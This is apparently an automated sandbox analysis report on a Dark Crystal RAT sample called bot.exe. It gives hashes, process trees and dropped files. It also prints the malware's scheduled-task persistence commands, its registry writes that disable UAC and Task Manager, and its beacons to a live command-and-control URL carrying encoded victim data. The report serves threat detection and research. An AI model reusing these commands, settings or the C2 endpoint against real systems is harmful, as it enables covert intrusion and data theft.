File name:

bot.exe

Full analysis: https://app.any.run/tasks/2a3aab1b-651b-4387-bb6d-ade0e85c1eeb
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: November 03, 2024, 21:18:45
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
dcrat
remote
darkcrystal
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

D9F7208D0116DCDE22ECE5048AC6C37D

SHA1:

F9B23D695BB875F032292983FE537C48BC02A657

SHA256:

15BA1DE7E069B6615CC13A43CC2B50426065E92E018066B0E3A3AF43BBA522EE

SSDEEP:

98304:ZFrKdQIu4rQQj8Uig2JVb+oNUjm4gOx52L+qKXiO+b54OI80CvGNl82V89k33MCD:Zn3GbMybtP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 6756)

    • UAC/LUA settings modification

      • Containerreview.exe (PID: 4956)

    • DARKCRYSTAL has been detected (SURICATA)

      • OfficeClickToRun.exe (PID: 5580)

    • Connects to the CnC server

      • OfficeClickToRun.exe (PID: 5580)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • OfficeClickToRun.exe (PID: 5580)

    • Reads security settings of Internet Explorer

      • bot.exe (PID: 6696)
      • ShellExperienceHost.exe (PID: 6384)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6756)
      • Containerreview.exe (PID: 4956)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6756)
      • Containerreview.exe (PID: 4956)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6756)

    • The executable file from the user directory is run by the CMD process

      • Containerreview.exe (PID: 4956)

    • Executed via WMI

      • schtasks.exe (PID: 6204)
      • schtasks.exe (PID: 5948)
      • schtasks.exe (PID: 6392)
      • schtasks.exe (PID: 2484)
      • schtasks.exe (PID: 6396)
      • schtasks.exe (PID: 6356)
      • schtasks.exe (PID: 1884)
      • schtasks.exe (PID: 4476)
      • schtasks.exe (PID: 6128)
      • schtasks.exe (PID: 920)
      • schtasks.exe (PID: 6556)
      • schtasks.exe (PID: 2652)
      • schtasks.exe (PID: 6736)
      • schtasks.exe (PID: 6548)
      • schtasks.exe (PID: 6912)
      • schtasks.exe (PID: 6572)
      • schtasks.exe (PID: 4448)
      • schtasks.exe (PID: 696)
      • schtasks.exe (PID: 5920)
      • schtasks.exe (PID: 5160)
      • schtasks.exe (PID: 4836)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 6288)
      • schtasks.exe (PID: 4312)

    • The process creates files with name similar to system file names

      • Containerreview.exe (PID: 4956)

    • Executes as Windows Service

      • WmiApSrv.exe (PID: 5372)
      • VSSVC.exe (PID: 5064)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6292)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 6684)

    • The process executes VB scripts

      • OfficeClickToRun.exe (PID: 5580)

    • Contacting a server suspected of hosting an CnC

      • OfficeClickToRun.exe (PID: 5580)

  • INFO

    • Checks supported languages

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • ShellExperienceHost.exe (PID: 6384)

    • Creates files or folders in the user directory

      • bot.exe (PID: 6696)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • bot.exe (PID: 6696)
      • wscript.exe (PID: 6756)

    • The process uses the downloaded file

      • bot.exe (PID: 6696)
      • wscript.exe (PID: 6756)

    • Reads the computer name

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • ShellExperienceHost.exe (PID: 6384)

    • Process checks computer location settings

      • bot.exe (PID: 6696)

    • Reads Environment values

      • Containerreview.exe (PID: 4956)

    • Reads the machine GUID from the registry

      • Containerreview.exe (PID: 4956)

    • Process checks whether UAC notifications are on

      • Containerreview.exe (PID: 4956)

    • Creates files in the program directory

      • Containerreview.exe (PID: 4956)

    • Application launched itself

      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5532)

    • Manual execution by a user

      • msedge.exe (PID: 5532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 114176
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
222
Monitored processes
90
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start bot.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs containerreview.exe shellexperiencehost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs w32tm.exe no specs #DARKCRYSTAL officeclicktorun.exe wscript.exe no specs wscript.exe no specs SPPSurrogate no specs vssvc.exe no specs wmiapsrv.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs bot.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
336"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1204 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
356"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7292 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
360"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6328 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
624"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3932 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
696schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\Modules\OfficeClickToRun.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\ApplicationFrameHost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1068"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2480 --field-trial-handle=2272,i,16656097283237007611,2784772124393046249,262144 --variations-seed-version /prefetch:3C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1160"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7408 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1176"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\b2dafb7f-e363-45cd-93d3-7f6421e8aca7.vbs" C:\Windows\System32\wscript.exeOfficeClickToRun.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1584"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6980 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
16 814
Read events
16 682
Write events
132
Delete events
0

Modification events

(PID) Process:(6696) bot.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(4956) Containerreview.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(4956) Containerreview.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(4956) Containerreview.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(4956) Containerreview.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process:(6384) ShellExperienceHost.exeKey:\REGISTRY\A\{6900bf3c-db31-c9e6-76df-e79a5de33f0e}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D000000B18E4204362EDB01
(PID) Process:(4956) Containerreview.exeKey:HKEY_CURRENT_USER\SOFTWARE\a7e6030628590f71478fff3b2ca5ef0474dc14a1
Operation:writeName:b3115a2183f8dfecdcc63140a965a00b30f4148a
Value:
WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxCcmlkZ2VhZ2VudEZvbnRcXENvbnRhaW5lcnJldmlldy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHQgVXNlclxcZGFzSG9zdC5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQ29udGFpbmVycmV2aWV3LmV4ZSIsIkM6XFxmb3VuZC4wMDBcXGRpcjAwMDAuY2hrXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQXBwbGljYXRpb25GcmFtZUhvc3QuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFdpbmRvd3MgTlRcXFRhYmxlVGV4dFNlcnZpY2VcXGVuLVVTXFxkYXNIb3N0LmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxXaW5kb3dzUG93ZXJTaGVsbFxcTW9kdWxlc1xcT2ZmaWNlQ2xpY2tUb1J1bi5leGUiLCJDOlxcVXNlcnNcXEFkbWluaXN0cmF0b3JcXERlc2t0b3BcXFVzZXJPT0JFQnJva2VyLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzICh4ODYpXFxNaWNyb3NvZnQuTkVUXFxSZWRpc3RMaXN0XFx3aW5sb2dvbi5leGUiXQ==
(PID) Process:(4956) Containerreview.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(4956) Containerreview.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(2652) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableTaskMgr
Value:
1
Executable files
51
Suspicious files
252
Text files
56
Unknown types
1

Dropped files

PID
Process
Filename
Type
4956Containerreview.exeC:\Users\Default\21b1a557fd31cctext
MD5:BC506563DDFFEC635E9B6C7680C229CC
SHA256:B73C623D5CAF2D380453413F017C02B312B9A5F7D36ADEF1CDD520F17148E287
4956Containerreview.exe
MD5:
SHA256:
6696bot.exeC:\Users\admin\AppData\Roaming\BridgeagentFont\LMbhEUlzAGhXQ88TEAwD9DBna.battext
MD5:3765C22496F7FD5EABD91A49EF3156DD
SHA256:21BCED2882FCD08EDDD626FCFD74964FB4387CE489D6A42D382C016F05B36564
6696bot.exeC:\Users\admin\AppData\Roaming\BridgeagentFont\E1OrDChd6wfhvlLu9Zc8rvL1kfwV.vbebinary
MD5:980B8C4323C6A30ADEFA83E5889189EB
SHA256:20B473780053528B67968274F63A4FD23CBF74E019B7532E0ACB5D5B9FDAA2D4
4956Containerreview.exeC:\found.000\dir0000.chk\SystemSettings.exeexecutable
MD5:E5CC3D0DE29F576E27666E7C6738A584
SHA256:EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956Containerreview.exeC:\Users\Default\dasHost.exeexecutable
MD5:E5CC3D0DE29F576E27666E7C6738A584
SHA256:EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
6696bot.exeC:\Users\admin\AppData\Roaming\BridgeagentFont\Containerreview.exeexecutable
MD5:E5CC3D0DE29F576E27666E7C6738A584
SHA256:EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956Containerreview.exeC:\found.000\dir0001.chk\ApplicationFrameHost.exeexecutable
MD5:E5CC3D0DE29F576E27666E7C6738A584
SHA256:EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956Containerreview.exeC:\found.000\dir0001.chk\Containerreview.exeexecutable
MD5:E5CC3D0DE29F576E27666E7C6738A584
SHA256:EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956Containerreview.exeC:\found.000\dir0001.chk\6e248630e82c92text
MD5:0AD50712D12A2AD18E9E19C053BC6CBF
SHA256:7F3CBEE778289EDFA572DF2AD24A5C44F2AFD673EC6541F7B5815679C1431B38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
371
TCP/UDP connections
149
DNS requests
119
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6944
svchost.exe
GET
200
104.103.72.96:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
AT
binary
1.01 Kb
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
104.103.72.96:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
AT
binary
1.01 Kb
whitelisted
7044
RUXIMICS.exe
GET
200
104.103.72.96:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
AT
binary
1.01 Kb
whitelisted
6944
svchost.exe
GET
2.18.69.217:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
AT
whitelisted
5488
MoUsoCoreWorker.exe
GET
2.18.69.217:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
AT
whitelisted
7044
RUXIMICS.exe
GET
200
2.18.69.217:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
AT
binary
973 b
whitelisted
5580
OfficeClickToRun.exe
GET
200
141.8.192.217:80
http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&d2130839ac106153b24ac33e3b551900=0VfiIiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiIlBTO4ADMwMjMwEjZ4QGZ5MTNycTNlJmN3QDZzQ2MmdzMyMDN2ATZlJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W
RU
whitelisted
5580
OfficeClickToRun.exe
GET
200
141.8.192.217:80
http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&d2130839ac106153b24ac33e3b551900=0VfiIiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiI4ImMiNTNxUWYjFjYxUWMmVGZlZWYyUWZmRjZmFWNlhzY2gjZkVzNkJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W
RU
whitelisted
5580
OfficeClickToRun.exe
GET
200
141.8.192.217:80
http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&788f8f72f0aa93e2493428a5ff5bdb83=d1nIlhjMmZWN4ITMykjN1M2YzczM3cTNiNDNkRGO2EjYjVGZjFmNygTZhJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W&d2130839ac106153b24ac33e3b551900=0VfiIiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiIlhjMmZWN4ITMykjN1M2YzczM3cTNiNDNkRGO2EjYjVGZjFmNygTZhJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNisHL9JCMYZWa4oWS2k0QNRTUX50aSdUT4FkaNFzZU9EbOdVWrRmaadXVH9EbGdVTo5keOpXWE9UbaRkT1UERaNTQU1Ua3lWS6FzRJdXSp9UanR0TxkUbalXU61UaOdlW4NmaZpXSEp1aaRVWqJ1VNJTVHp1MVdkWtpkMZJTVH10MZdkTpJVbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSplkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSw1ERJ5WNXF2dChlWw4kRJBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJlTGV0Sn9GSThkQ65UdJRUSBJ0UWFlTFl0dBRkTyAzUOBnQTtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDJ0QN9WQpNGbSh0YoJ1VRd2aYl1cCNzYwJVRJpGbyMGaKVUSwolMipXOtNmasdFVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljSDpFaSdUYuZUbRZXRXFmeGtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMlWRYlVesVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dpl0MnR1T1lERONXRU9UMnpGTy0kaJZTS5lld41WSzl0UVpkSp9Uar52YwUzVkZnTtl0cJlXY2h2VkVkSp9Ua0IjYwR2ValnSDxUazJjYvZFSSl2bqlUNShVYqp0QMl2Y61Ue0M0TzQTeORTRqxUMnRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiIxYDZjNjZyQzMlFmZjFDZ5EGNkNmNlZjZxATOlRGMmFDNkR2N4MjNyIiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MT